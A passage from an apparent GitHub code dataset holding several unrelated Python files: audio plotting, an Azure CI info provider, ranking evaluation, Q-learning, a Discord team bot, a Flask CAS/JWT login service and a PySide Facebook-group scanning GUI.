wavFileName =\"PitchShiftedOutput.wav\"\n sampleRate, dataArray = wavfile.read(wavFileName)\n plt.plot( dataArray[0:])\n plt.xlim(0,10000)\n # display the plot\n plt.show()\n \nelse:\n spf = wave.open(\"//engin-labs.m.storage.umich.edu/allanahm/windat.v2/Documents/OSR_us_000_0010_8k.wav\", \"r\")\n \n # Extract Raw Audio from Wav File\n signal = spf.readframes(-1)\n signal = np.frombuffer(signal, dtype='int16')\n fs = spf.getframerate()\n \n # If Stereo\n if spf.getnchannels() == 2:\n print(\"Just mono files\")\n sys.exit(0)\n \n \n Time = np.linspace(0, len(signal) / fs, num=len(signal))\n \n \n # read audio samples\n input_data = wavfile.read(wavFileName)\n audio = input_data[1]\n \n \n # plot the first 1024 samples of original signal\n plt.plot(audio[0:])\n # label the axes\n plt.ylabel(\"Amplitude\")\n plt.xlabel(\"Time\")\n # set the title \n plt.title(\"Audio Signal of Wav File\") \n # display the plot\n plt.show()\n \n \n wav_file = wave.open(wavFileName)\n totalFrames=wav_file.getframerate()\n data = wav_file.readframes(totalFrames)\n wav_file.close()\n data = struct.unpack('{n}h'.format(n=totalFrames), data)\n data = np.array(data)\n data_fft = np.fft.fft(data)\n # This will give us the frequency we want\n \n frequencies = np.abs(data_fft)\n print(\"The frequency is {} Hz\".format(np.argmax(frequencies)))\n \n \n #Original Signal Analysis and Plots\n plt.plot(data[:])\n plt.title(\"Original Audio Wave\")\n plt.ylabel(\"Amplitude\")\n plt.show()\n \n plt.plot(frequencies)\n plt.title(\"Frequencies found\")\n plt.xlim(0,3000)\n plt.ylabel(\"Quantity\")\n plt.xlabel(\"Frequency\")\n plt.show()\n \n \n #Output File Analysis and Plots (same methods as above)\n wav_file = wave.open(\"PitchShiftedOutput.wav\", 'r')\n totalFrames=wav_file.getframerate()\n data = wav_file.readframes(totalFrames)\n wav_file.close()\n data = struct.unpack('{n}h'.format(n=totalFrames), data)\n data = np.array(data)\n data_fft = np.fft.fft(data)\n # This will give us the frequency we want\n \n frequencies = np.abs(data_fft)\n print(\"The frequency is {} Hz\".format(np.argmax(frequencies)))\n \n plt.plot(data[:])\n plt.title(\"Output Audio Wave\")\n plt.ylabel(\"Amplitude\")\n plt.show()\n \n plt.plot(frequencies)\n plt.title(\"Output Frequencies Found\")\n plt.ylabel(\"Quantity\")\n plt.xlabel(\"Frequency\")\n plt.xlim(0,3000)\n plt.show()\n","repo_name":"michalcourson/Harmonizer","sub_path":"src/Prototypes/offline_python_prototypes/Granular_Synthesis.py","file_name":"Granular_Synthesis.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25753934459","text":"from uuid import uuid4\nfrom foresight.environment.git.git_helper import GitHelper\nfrom foresight.environment.environment_info import EnvironmentInfo\nfrom foresight.utils.test_runner_utils import TestRunnerUtils\nimport os, logging\nfrom foresight.utils.generic_utils import print_debug_message_to_console\n\nLOGGER = logging.getLogger(__name__)\n\nclass AzureEnvironmentInfoProvider:\n\n ENVIRONMENT = \"Azure\"\n BUILD_BUILDID_ENV_VAR_NAME = \"BUILD_BUILDID\"\n BUILD_REPOSITORY_NAME_ENV_VAR_NAME = \"BUILD_REPOSITORY_NAME\"\n BUILD_REPOSITORY_URI_ENV_VAR_NAME = \"BUILD_REPOSITORY_URI\"\n BUILD_SOURCEBRANCHNAME_ENV_VAR_NAME = \"BUILD_SOURCEBRANCHNAME\"\n BUILD_SOURCEVERSION_ENV_VAR_NAME = \"BUILD_SOURCEVERSION\"\n BUILD_SOURCEVERSIONMESSAGE_ENV_VAR_NAME = \"BUILD_SOURCEVERSIONMESSAGE\"\n INVOCATION_ID_ENV_VAR_NAME = \"INVOCATION_ID\"\n BUILD_REPOSITORY_PROVIDER_ENV_VAR_NAME = \"BUILD_REPOSITORY_PROVIDER\"\n\n @classmethod\n def get_test_run_id(cls, repo_url, commit_hash, environment):\n configured_test_run_id = TestRunnerUtils.get_configured_test_run_id()\n if configured_test_run_id:\n return configured_test_run_id\n build_number = os.getenv(cls.BUILD_BUILDID_ENV_VAR_NAME)\n invocation_id = os.getenv(cls.INVOCATION_ID_ENV_VAR_NAME)\n test_run_key = cls.generate_test_run_key(invocation_id, build_number)\n if test_run_key:\n return TestRunnerUtils.get_test_run_id(environment, repo_url, commit_hash, test_run_key)\n else:\n return TestRunnerUtils.get_default_test_run_id(environment, repo_url, commit_hash)\n\n\n @staticmethod\n def generate_test_run_key(invocation_id=None, build_number=None):\n if invocation_id and build_number:\n return invocation_id + \"-\" + build_number\n elif invocation_id:\n return invocation_id\n elif build_number:\n return build_number\n else:\n return None\n\n @classmethod\n def build_env_info(cls):\n try:\n repo_url = os.getenv(cls.BUILD_REPOSITORY_URI_ENV_VAR_NAME)\n repo_name = os.getenv(cls.BUILD_REPOSITORY_NAME_ENV_VAR_NAME) or GitHelper.extractRepoName(repo_url)\n branch = os.getenv(cls.BUILD_SOURCEBRANCHNAME_ENV_VAR_NAME)\n commit_hash = os.getenv(cls.BUILD_SOURCEVERSION_ENV_VAR_NAME)\n commit_message = os.getenv(cls.BUILD_SOURCEVERSIONMESSAGE_ENV_VAR_NAME) or GitHelper.get_commit_message()\n repo_provider = os.getenv(cls.BUILD_REPOSITORY_PROVIDER_ENV_VAR_NAME)\n \n environment = cls.ENVIRONMENT + \" - \" + str(repo_provider) if repo_provider else cls.ENVIRONMENT\n\n if not branch:\n branch = GitHelper.get_branch()\n\n if not commit_hash:\n commit_hash = GitHelper.get_commit_hash()\n\n test_run_id = cls.get_test_run_id(repo_url, commit_hash, environment)\n\n env_info = EnvironmentInfo(test_run_id, environment, repo_url, repo_name, \n branch, commit_hash, commit_message)\n print_debug_message_to_console(\"Azure Environment info: {}\".format(env_info.to_json()))\n return env_info\n except Exception as err:\n print_debug_message_to_console(\"Unable to build environment info: {}\".format(err))\n LOGGER.error(\"Unable to build environment info: {}\".format(err))\n pass\n return None","repo_name":"thundra-io/thundra-agent-python","sub_path":"foresight/environment/azure/azure_environment_info_provider.py","file_name":"azure_environment_info_provider.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"18914305484","text":"import sys\n\nimport numpy as np\nimport pandas as pd\nfrom Corras.Scenario.aslib_ranking_scenario import ASRankingScenario\nfrom itertools import product\n\n# measures\nfrom scipy.stats import kendalltau, describe\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom Corras.Evaluation.evaluation import ndcg_at_k, compute_relevance_scores_unit_interval\n\n# plotting\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Database\nimport sqlalchemy as sql\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import Table, MetaData\nfrom sqlalchemy.sql import exists, select, and_, or_\nimport urllib\n\nsns.set_style(\"darkgrid\")\n\n\ndef compute_distance_to_vbs(predicted_performances, true_performances):\n result = true_performances[np.argmin(predicted_performances)] - np.min(\n true_performances)\n return result\n\n\nscenario_path = \"./aslib_data-aslib-v4.0/\"\nresults_path_corras = \"./results-lh/\"\nevaluations_path = \"./evaluations/\"\nfigures_path = \"./figures/\"\n\n# DB data\ndb_url = sys.argv[1]\ndb_user = sys.argv[2]\ndb_pw = urllib.parse.quote_plus(sys.argv[3])\ndb_db = sys.argv[4]\n\nscenarios = [\n \"CPMP-2015\",\n \"MIP-2016\",\n \"CSP-2010\",\n \"SAT11-HAND\",\n \"SAT11-INDU\",\n \"SAT11-RAND\",\n # \"CSP-Minizinc-Time-2016\",\n # \"MAXSAT-WPMS-2016\",\n # \"MAXSAT-PMS-2016\",\n # \"QBF-2016\"\n]\n\nlambda_values = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\nepsilon_values = [1.0]\nmax_pairs_per_instance = 5\nmaxiter = 100\nseeds = [1, 2, 3, 4, 5, 15]\nuse_quadratic_transform_values = [False, True]\nuse_max_inverse_transform_values = [\"max_cutoff\"]\nscale_target_to_unit_interval_values = [True]\nskip_censored_values = [False]\nregulerization_params_values = [0.001]\nuse_weighted_samples_values = [False]\nsplits = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nparams = [\n lambda_values, epsilon_values, splits, seeds,\n use_quadratic_transform_values, use_max_inverse_transform_values,\n scale_target_to_unit_interval_values, skip_censored_values,\n regulerization_params_values, use_weighted_samples_values\n]\n\nparam_product = list(product(*params))\n\nfor scenario_name in scenarios:\n\n corras_measures = []\n\n scenario = ASRankingScenario()\n scenario.read_scenario(scenario_path + scenario_name)\n scenario.compute_rankings(False)\n relevance_scores = compute_relevance_scores_unit_interval(scenario)\n\n # params_string = \"-\".join([scenario_name,\n # str(lambda_value), str(split), str(seed), str(use_quadratic_transform), str(use_max_inverse_transform), str(scale_target_to_unit_interval)])\n\n filename = \"linhinge_test-\" + scenario_name + \".csv\"\n # loss_filename = \"pl_log_linear\" + \"-\" + params_string + \"-losses.csv\"\n filepath = results_path_corras + filename\n # print(filepath)\n # loss_filepath = results_path_corras + loss_filename\n corras = None\n try:\n table_name = \"ki2020_linhinge-\" + scenario_name\n\n engine = sql.create_engine(\"mysql://\" + db_user + \":\" + db_pw + \"@\" +\n db_url + \"/\" + db_db,\n echo=False)\n connection = engine.connect()\n corras = pd.read_sql_table(table_name=table_name, con=connection)\n connection.close()\n except Exception as exc:\n print(\"File for \" + scenario_name +\n \" not found in corras result data! Exception \" + str(exc))\n continue\n # for lambda_value, split, seed, use_quadratic_transform, use_max_inverse_transform, scale_target_to_unit_interval in param_product:\n # print(corras.head())\n corras.set_index(\"problem_instance\", inplace=True)\n performance_indices = [\n x for x in corras.columns if x.endswith(\"_performance\")\n ]\n\n # lambda_values = pd.unique(corras[\"lambda\"])\n # epsilon_values = pd.unique(corras[\"epsilon\"])\n # print(lambda_values)\n # print(epsilon_values)\n\n # print(scenario.performance_data)\n # print(relevance_scores)\n\n for lambda_value, epsilon_value, split, seed, use_quadratic_transform, use_max_inverse_transform, scale_target_to_unit_interval, skip_censored, regulerization_param, use_weighted_samples in param_product:\n test_scenario, train_scenario = scenario.get_split(split)\n\n current_frame = corras.loc[\n (corras[\"lambda\"] == lambda_value)\n & (corras[\"epsilon\"] == epsilon_value) & (corras[\"split\"] == split)\n & (corras[\"seed\"] == seed) &\n (corras[\"use_quadratic_transform\"] == use_quadratic_transform) &\n (corras[\"use_max_inverse_transform\"] == use_max_inverse_transform)\n & (corras[\"scale_target_to_unit_interval\"] ==\n scale_target_to_unit_interval)\n & (corras[\"skip_censored\"] == skip_censored)\n & (corras[\"regulerization_param\"] == regulerization_param)\n & (corras[\"use_weighted_samples\"] == use_weighted_samples)]\n # current_frame = corras.loc[(corras[\"lambda\"] == lambda_value)]\n # print(current_frame)\n if len(current_frame) != len(test_scenario.performance_data):\n print(\n f\"The frame contains {len(current_frame)} entries, but the {scenario_name} contains {len(test_scenario.performance_data)} entries in split {split} seed {seed}!\"\n )\n continue\n for problem_instance, performances in test_scenario.performance_data.iterrows(\n ):\n # if not problem_instance in current_frame.index:\n # continue\n true_performances = scenario.performance_data.loc[\n problem_instance].astype(\"float64\").to_numpy()\n true_ranking = scenario.performance_rankings.loc[\n problem_instance].astype(\"float64\").to_numpy()\n # print(current_frame.loc[problem_instance])\n tau_corr = 0\n tau_p = 0\n ndcg = 0\n mse = 0\n mae = 0\n abs_vbs_distance = 0\n par10 = 0\n run_stati = scenario.runstatus_data.loc[problem_instance]\n # print(corras)\n corras_performances = current_frame.loc[problem_instance][\n performance_indices].astype(\"float64\").to_numpy()\n corras_ranking = current_frame.loc[problem_instance][\n performance_indices].astype(\"float64\").rank(\n method=\"min\").astype(\"int16\").to_numpy()\n if np.isinf(corras_performances).any():\n print(\"Warning, NaN in performance prediction for \" +\n problem_instance + \"!\")\n continue\n tau_corr, tau_p = kendalltau(true_ranking, corras_ranking)\n mse = mean_squared_error(true_performances, corras_performances)\n mae = mean_absolute_error(true_performances, corras_performances)\n abs_vbs_distance = compute_distance_to_vbs(corras_performances,\n true_performances)\n ndcg = ndcg_at_k(corras_ranking,\n relevance_scores.loc[problem_instance].to_numpy(),\n len(scenario.algorithms))\n par10 = true_performances[np.argmin(corras_performances)]\n run_status = run_stati.iloc[np.argmin(corras_performances)]\n corras_measures.append([\n split, seed, problem_instance, lambda_value, epsilon_value,\n use_quadratic_transform, use_max_inverse_transform,\n scale_target_to_unit_interval, skip_censored,\n regulerization_param, use_weighted_samples, tau_corr, tau_p,\n ndcg, mse, mae, abs_vbs_distance, par10, run_status\n ])\n # print(corras_measures)\n df_corras = pd.DataFrame(\n data=corras_measures,\n columns=[\n \"split\", \"seed\", \"problem_instance\", \"lambda\", \"epsilon\",\n \"quadratic_transform\", \"max_inverse_transform\",\n \"scale_to_unit_interval\", \"skip_censored\", \"regularization_param\",\n \"use_weighted_samples\", \"tau_corr\", \"tau_p\", \"ndcg\", \"mse\", \"mae\",\n \"abs_distance_to_vbs\", \"par10\", \"run_status\"\n ])\n df_corras.to_csv(evaluations_path + \"ki2020-linhinge-\" + scenario_name +\n \".csv\")\n","repo_name":"JonasHanselle/CoRRAS","sub_path":"evaluation/evaluation_lin_hinge.py","file_name":"evaluation_lin_hinge.py","file_ext":"py","file_size_in_byte":8212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"29906538566","text":"from Model.Proprocessing import preprocess, split, scale\nimport json\nimport pickle as pk\nimport os\nimport pandas as pd\n\n\ndef prediction(df, pkmodel, model_name=None, data=None):\n path = os.getcwd()\n models = os.listdir(f'{path}/pkmodel')\n\n if pkmodel == 'best':\n model_name = models['best' in models]\n data = model_name.split('_')[2]\n elif pkmodel == 'auto':\n model_name = f'{model_name}_{data}_model.pkl'\n\n # data preprocess\n # df = pd.read_excel(df_name)\n df = preprocess(df, train=False)\n X, y = split(df) # Data splitting\n if data == 'scale':\n X = scale(X) # Scale\n elif data == 'pca':\n pca = pk.load(open(f'{path}/pkmodel/pca.pkl', 'rb'))\n X = scale(X)\n X = pca.transform(X)\n\n model = pk.load(open(f'{path}/pkmodel/{model_name}', 'rb'))\n predict = model.predict(X)\n\n return predict, model_name\n\n","repo_name":"Capstone-SRL/SRL","sub_path":"Model/Model_prediction.py","file_name":"Model_prediction.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25850984371","text":"import os\nimport requests\nimport jwt\nimport sys\n\nfrom flask import Flask, request, jsonify, abort\nfrom flask_cors import cross_origin, CORS\n\napp = Flask(__name__)\nCORS(app, support_credentials=True)\n\nSERVICE = \"https://hebi.diamond.ac.uk/launcher/\"\nCAS_SERVER = \"https://auth.diamond.ac.uk/cas\"\nCAS_VALIDATE_URL = \"{}/serviceValidate\".format(CAS_SERVER)\nJWT_ALGORITHM = 'HS256'\n\n\ndef process_token(token):\n '''\n Decode the JWT that is the cookie in the user's web browser\n '''\n try:\n payload = jwt.decode(token, os.environ['JWT_KEY'], algorithms=[JWT_ALGORITHM])\n except Exception as e:\n raise KeyError(str(e))\n return payload\n\n\n@app.route('/')\ndef check_for_cookie():\n '''\n Check if the HTTP request that came from the launcher web app in the\n browser has a cookie that denotes if a user has authenticated to the\n launcher\n '''\n cookie = request.cookies.get('token')\n payload = {}\n\n if cookie is None:\n # unauthorised user requesting access\n abort(403)\n else:\n # check the token to see if the 'username' value in it matches the\n # owner of the Hebi session (which is defined in the FEDID env var)\n decoded_token = process_token(cookie)\n\n if 'username' not in decoded_token:\n # something is wrong with the token, so deny access\n payload['has_requestor_been_authenticated'] = False\n return jsonify(payload)\n else:\n # token has the username, so they have been authenticated to get to\n # the launcher page\n payload['has_requestor_been_authenticated'] = True\n payload['username'] = decoded_token['username']\n\n return jsonify(payload)\n\n\n@app.route('/validate_ticket')\ndef validate_ticket():\n '''\n Validate a ticket that was handed to the user's web browser by the CAS\n server\n '''\n data = request.args.to_dict()\n params = {\n 'format': 'json',\n 'ticket': data['ticket'],\n 'service': SERVICE\n }\n auth_req = requests.get(CAS_VALIDATE_URL, params=params)\n\n # used for holding info about the validation request\n output_dict = {\n 'validated': False \n }\n\n # check the CAS server response to the validation request\n try:\n auth_resp = auth_req.json()\n except Exception as e:\n output_dict['desc'] = 'invalid_CAS_server_response'\n output_dict['validated'] = False\n return jsonify(output_dict)\n\n if 'authenticationSuccess' in auth_resp['serviceResponse']:\n username = auth_resp['serviceResponse']['authenticationSuccess']['user']\n output_dict['validated'] = True\n output_dict['user'] = username\n output_dict['desc'] = 'successful authentication'\n\n # create a token from the ticket validation that has the user's FedID\n # stored in it\n payload = {\n 'username': username\n }\n token = jwt.encode(payload, os.environ['JWT_KEY'], algorithm=JWT_ALGORITHM)\n output_dict['token'] = token\n resp = jsonify(output_dict)\n\n # set a cookie in the client's web browser\n resp.set_cookie('token', token)\n elif 'authenticationFailure' in auth_resp['serviceResponse']:\n output_dict['validated'] = False\n output_dict['code'] = auth_resp['serviceResponse']['authenticationFailure']['code']\n output_dict['desc'] = auth_resp['serviceResponse']['authenticationFailure']['description']\n resp = jsonify(output_dict)\n else:\n # something else went wrong\n output_dict['validated'] = False\n output_dict['desc'] = 'invalid_CAS_server_response'\n resp = jsonify(output_dict)\n\n return resp\n\n\ndef main(argv):\n\n if os.environ['FLASK_MODE'] == 'production':\n import bjoern\n bjoern.run(app, '127.0.0.1', port=8086)\n else:\n app.run(host='0.0.0.0', port=8086, debug=True, use_reloader=True,\n threaded=True)\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"yousefmoazzam/hebi-launcher","sub_path":"cas-auth/cas-auth.py","file_name":"cas-auth.py","file_ext":"py","file_size_in_byte":4006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9866409788","text":"from tkinter import *\r\nfrom random import uniform \r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\nroot = tk.Tk()\r\nroot.title(\"MÉTODO MONTECARLO: EJERCICIO 2\")\r\nroot.geometry('790x680+400+5')\r\n#root.resizable(False, True)\r\nroot.configure(background=\"hotpink4\")\r\n\r\n\r\nlbl1=tk.Label(root,text='La evolución del valor de unas acciones \\n varia diariamente siguiendo el siguiente esquema', background=\"gold\")\r\nlbl1.place(x=25,y=10)\r\n\r\narea=('Cambio de la cotización', 'Probabilidad')\r\n\r\nac=('all','n')\r\nsales_data=[('-1/8','3/36'),\r\n ('sin cambios','7/36'),\r\n ('+1/8','16/36'),\r\n ('+1/2','7/36'),\r\n ('+1','3/36')\r\n ]\r\n\r\ntv=ttk.Treeview(root,columns=ac,show='headings',height=5)\r\nfor i in range(2):\r\n tv.column(ac[i],width=140,anchor='center', stretch=tk.NO)\r\n tv.heading(ac[i],text=area[i])\r\ntv.place(x=20,y=60)\r\n\r\nfor i in range(5):\r\n tv.insert('','end',values=sales_data[i])\r\n \r\n\r\ndef intervalos():\r\n a4=[]\r\n a5=[]\r\n i=0\r\n sum=0\r\n while(ia[1][0] and naa[2][0] and naa[3][0] and naa[4][0] and na List:\n return [member for member in members if not member.bot]\n\n\ndef generate_teams(members: List, number_of_teams: int):\n random.shuffle(members)\n return [list(team) for team in np.array_split(members, number_of_teams)]\n\n\ndef get_channel_by_name(channels, name):\n for c in channels:\n if c.name == name:\n return c\n return None\n\n\ndef get_channel_by_position(channels, index):\n for c in channels:\n if c.position == index:\n return c\n return None\n\n\ndef get_voice_channel(ctx, arg):\n channels = ctx.guild.voice_channels\n c = get_channel_by_name(channels, arg)\n if c is None and arg.isdigit():\n c = get_channel_by_position(channels, int(arg)-1)\n return c\n\n\nasync def move_members(bot, members, channel):\n for m in members:\n await m.move_to(channel)\n","repo_name":"mat-sop/random_team","sub_path":"random_team/cogs/utils/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1481623388","text":"\n\nfrom RLAgent import RLAgent\n\n# Import wandb for logging the agents' runs.\nimport wandb\n\nimport gym\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass QAgent(RLAgent):\n \"\"\"\n A class used to build Q-learning algorithms.\n \n This subclass of RLAgent allows to build Q-learning algorithms with\n externally specified (hyper-)parameters and provides the necessary methods\n for training an algorithm.\n \n Attributes\n ----------\n env : env\n The environment of a RL algorithm.\n \n gamma : float\n The discount factor for future rewards.\n \n learning_rate : float\n The learning rate.\n \n epsilon : float\n The epsilon.\n \n epsilon_min : float\n The minimum epsilon value.\n \n epsilon_decay : float\n The epsilon decay.\n \n divisor : int or float\n Number used in learning rate decay.\n \n buckets : tuple of ints\n Tuple used to discretize the observation space.\n \n training_episodes : int\n Maximum number of training episodes.\n \n testing_episodes : int\n Maximum number of testing episodes.\n \n frames : int\n Maximum number of frames during an episode.\n \n Methods\n -------\n discretize(state)\n Takes an observation space and returns a discreticed observation space.\n \n get_action(state, epsilon)\n Chooses and returns an action from the action space.\n \n update_Q(state, action, reward, next_state, learning_rate)\n Updates the state-action pairs and Q values in the Q-table.\n \n run()\n Loop to train the Q-agent.\n \"\"\"\n \n def __init__(self, env, gamma, learning_rate, epsilon, epsilon_min, epsilon_decay, divisor,\n buckets, training_episodes, testing_episodes, frames):\n \n RLAgent.__init__(self, env, training_episodes, testing_episodes, frames)\n self.env = env\n self.gamma = gamma\n self.learning_rate = learning_rate\n self.epsilon = epsilon\n self.epsilon_min = epsilon_min\n self.epsilon_decay = epsilon_decay\n self.divisor = divisor \n self.buckets = (3,3,6,6,)\n \n self.Q = np.zeros(self.buckets + (self.env.action_space.n,))\n \n def discretize(self, state):\n upper_bounds = [self.env.observation_space.high[0], 0.5,\n self.env.observation_space.high[2], math.radians(50)]\n \n lower_bounds = [self.env.observation_space.low[0], -0.5,\n self.env.observation_space.low[2], -math.radians(50)]\n \n ratios = [(state[i] + abs(lower_bounds[i])) /\n (upper_bounds[i] - lower_bounds[i])\n for i in range(len(state))]\n \n discretized_state = [int(round((self.buckets[i] - 1) *ratios[i]))\n for i in range(len(state))]\n \n discretized_state = [min(self.buckets[i] -1,\n max(0, discretized_state[i]))\n for i in range(len(state))]\n \n return tuple(discretized_state)\n \n def get_action(self, state, epsilon):\n return self.env.action_space.sample() if (\n np.random.random() <= epsilon) else np.argmax(self.Q[state])\n \n def update_Q(self, state, action, reward, next_state, learning_rate):\n self.Q[state][action] += learning_rate * (\n reward + self.gamma * np.max(\n self.Q[next_state]) - self.Q[state][action])\n \n def run(self):\n print(\"running\")\n for episode in range(self.training_episodes):\n \n episode_reward = 0\n discretized_state = self.discretize(self.env.reset())\n done = False\n \n while not done:\n \n action = self.get_action(discretized_state, self.epsilon)\n state, reward, done, info = self.env.step(action)\n next_state = self.discretize(state)\n self.update_Q(discretized_state, action, reward, next_state,\n self.learning_rate)\n discretized_state = next_state\n # env.render()\n episode_reward += reward\n average_reward = np.mean(self.training_episode_rewards)\n \n if average_reward > 200:\n break\n \n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n \n self.training_episode_rewards.append(episode_reward)\n self.training_average_rewards.append(average_reward)\n print(\"Episode: {}, total_reward: {:.2f}, Epsilon: {:.2f}\".format(\n episode, episode_reward, self.epsilon))\n \n \n self.env.close()\n \n","repo_name":"JonasRosenzweig/RLProject","sub_path":"PythonCode/Main/QLearning.py","file_name":"QLearning.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13091937679","text":"from PySide6.QtWidgets import QWidget,QWidgetAction\nfrom PySide6.QtWidgets import QWidget, QMenu,QInputDialog,QLineEdit,QHeaderView\nfrom PySide6.QtCore import QSortFilterProxyModel,QRegularExpression, Qt,QItemSelectionModel\nfrom PySide6.QtSql import QSqlTableModel\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom PySide6.QtWidgets import (QApplication, QMenu, QFrame, QVBoxLayout, QSizePolicy,QPushButton,\n QWidget)\nfrom views.ui.fanpages.joined_groups_ui import Ui_JoinedGroup\nfrom views.table_custome import TableCustome\nfrom controllers.main_ctrl import MainController\nimport logging\n\nclass CustomProxyModel(QtCore.QSortFilterProxyModel):\n def __init__(self, parent=None):\n super().__init__(parent)\n self._filters = dict()\n\n @property\n def filters(self):\n return self._filters\n def clearFilters(self):\n self._filters.clear()\n def flags(self, index):\n return Qt.ItemIsSelectable | Qt.ItemIsEnabled | Qt.ItemIsEditable\n def setFilter(self, expresion, column):\n if expresion:\n self._filters[column] = expresion\n elif column in self._filters:\n del self._filters[column]\n self.invalidateFilter()\n\n def filterAcceptsRow(self, source_row, source_parent):\n for column, expresion in self._filters.items():\n text = self.sourceModel().index(source_row, column, source_parent).data()\n regex = QRegularExpression(\n expresion, QRegularExpression.CaseInsensitiveOption\n )\n if not regex.match(text).hasMatch():\n return False\n return True\n\nclass GroupView(QWidget):\n def __init__(self, controller: MainController):\n super(GroupView, self).__init__()\n self._controller = controller\n self.ui = Ui_JoinedGroup()\n self.ui.setupUi(self)\n self.activeUID = None\n \n self._controller.signals.scan_group_completed.connect(self.refresh)\n\n \n self.verticalLayout = QVBoxLayout(self.ui.tbl_group)\n self.table_group_view = TableCustome()\n self.verticalLayout.addWidget(self.table_group_view)\n\n\n self.model = QSqlTableModel(self)\n # self.model.setQuery('SELECT * from fanpages')\n # self.model.select()\n # self.table_group_view.ui.tableView.setModel(self.model)\n\n #TODO: show model in table with custome condition\n self.page_model = QSqlTableModel(self)\n self.page_model.setQuery('SELECT * from fanpages')\n self.page_model.select()\n\n self.acc_model = QSqlTableModel(self)\n self.acc_model.setQuery('SELECT * FROM accounts')\n self.ui.cb_uids.setModel(self.acc_model)\n self.ui.cb_uids.setModelColumn(1)\n\n # self.ui.cb_pages.setModel(self.page_model)\n # self.ui.cb_pages.setModelColumn(2) \n \n self.ui.cb_uids.installEventFilter(self)\n\n self.ui.btn_view_group.clicked.connect(self.show_default_group)\n self.ui.btn_view_scan_group.clicked.connect(self.show_scan_group_by_keyword)\n self.ui.btn_scan_by_key.clicked.connect(self.scan_groups_by_keyword)\n self.ui.btn_posts.clicked.connect(self.view_posts_table)\n self.ui.btn_history_posts.clicked.connect(self.scan_post_history)\n\n self.table_group_view.ui.tableView.setContextMenuPolicy(QtGui.Qt.CustomContextMenu)\n self.table_group_view.ui.tableView.customContextMenuRequested.connect(self.open_group_menu)\n\n\n self.horizontalHeader = self.table_group_view.ui.tableView.horizontalHeader()\n self.horizontalHeader.sectionClicked.connect(self.on_view_horizontalHeader_sectionClicked)\n\n # self.headers = self.table_group_view.ui.tableView.horizontalHeader()\n self.horizontalHeader.setContextMenuPolicy(QtGui.Qt.CustomContextMenu)\n self.horizontalHeader.customContextMenuRequested.connect(self.header_popup)\n \n # self.horizontalHeader.setSectionResizeMode(0, QHeaderView.ResizeMode.ResizeToContents)\n # self.table_group_view.ui.tableView.setColumnWidth(0,10)\n self.table_group_view.ui.tableView.setColumnWidth(1,100)\n self.on_init()\n\n def scan_post_history(self):\n selected_ids = []\n selected_ids.append(self.ui.cb_uids.currentText())\n loop_scan, ok = QInputDialog.getInt(self, \"Quét history post\",\n \"Loop Scan:\", 1, 1, 100, 1)\n if not ok:\n return\n self._controller.signals.scan_post_history.emit(selected_ids , loop_scan, 1)\n def header_popup(self, pos) :\n self.header_right_click_column = self.horizontalHeader.logicalIndexAt(pos)\n menu = QMenu()\n ql = QLineEdit()\n ql.textChanged.connect(self.onTextChanged)\n wAction = QWidgetAction(self)\n wAction.setDefaultWidget(ql)\n menu.addAction(wAction)\n action = menu.exec_(self.table_group_view.ui.tableView.mapToGlobal(pos))\n\n def onTextChanged(self, text):\n self.proxy.setFilter(text, self.header_right_click_column)\n def open_group_menu(self, position):\n indexes = self.table_group_view.ui.tableView.selectionModel().selectedRows()\n if not indexes:\n return\n \n \n # selected_indexs = self.table_group_view.ui.tableView.selectionModel().selectedRows(0)\n\n # self.seleted_id = [self.model.data(self.proxy.mapToSource(index)) for index in sorted(selected_indexs)] \n selected_indexs = self.table_group_view.ui.tableView.selectionModel().selectedRows()\n\n self.seleted_id = [self.table_group_view.ui.tableView.model().data(i) for i in sorted(selected_indexs)]\n \n menu = QMenu()\n table_delete_action = QtGui.QAction(\"Delete: {}\".format(len(self.seleted_id)), self)\n edit_type = QtGui.QAction(\"Edit Type\", self)\n menu.addAction(edit_type)\n menu.addAction(table_delete_action)\n edit_type.triggered.connect(self.edit_type)\n table_delete_action.triggered.connect(self.delete_selected_row)\n \n\n if self.active_tb == 'groups_tita':\n check_allow_page_interact = QtGui.QAction(\"Kiểm tra nhóm chấp nhận tương tác Page\")\n menu.addAction(check_allow_page_interact)\n check_allow_page_interact.triggered.connect(self.on_check_allow_page_interact)\n elif self.active_tb == 'posts':\n menu.removeAction(edit_type)\n scan_approve_post = QtGui.QAction(\"Quét approve post\", self)\n menu.addAction(scan_approve_post)\n scan_approve_post.triggered.connect(self.on_scan_approve_post)\n else:\n filter_notsave = QtGui.QAction(\"Lọc nhóm chưa lưu\", self)\n save_action = QtGui.QAction(\"Lưu\", self)\n menu.addAction(filter_notsave)\n menu.addAction(save_action)\n save_action.triggered.connect(self.save_database)\n filter_notsave.triggered.connect(self.filter_notsave)\n \n action = menu.exec_(self.table_group_view.ui.tableView.mapToGlobal(position))\n\n def on_check_allow_page_interact(self):\n COLUMN_GROUP_LINK = 1\n uid = self.ui.cb_uids.currentText()\n selected_indexs = 